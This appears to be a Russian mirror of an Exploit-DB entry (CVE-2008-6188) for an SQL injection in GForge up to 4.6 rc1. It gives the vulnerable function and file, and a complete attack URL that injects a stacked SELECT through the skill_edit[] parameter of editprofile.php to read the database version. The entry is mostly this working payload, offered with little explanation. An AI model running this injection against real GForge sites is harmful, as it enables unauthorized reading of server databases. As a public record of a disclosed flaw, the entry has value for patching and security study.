- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6708
- Проверка EDB
-
- Пройдено
- Автор
- BEFORD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6188
- Дата публикации
- 2008-10-09
Код:
Gforge <= 4.6 rc1 skill_edit SQL injection
Vendor Notified: 2008-10-06
Impact: zomg!
Note: should work regardless magic_quotes_gpc setting.
Requires: Creating an account and be logged in
Vulnerable function: handle_multi_edit($skill_ids) on /www/people/skills_utils.php
http://gforge.site/people/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&MultiEdit=Edit
# milw0rm.com [2008-10-09]- Источник
- www.exploit-db.com
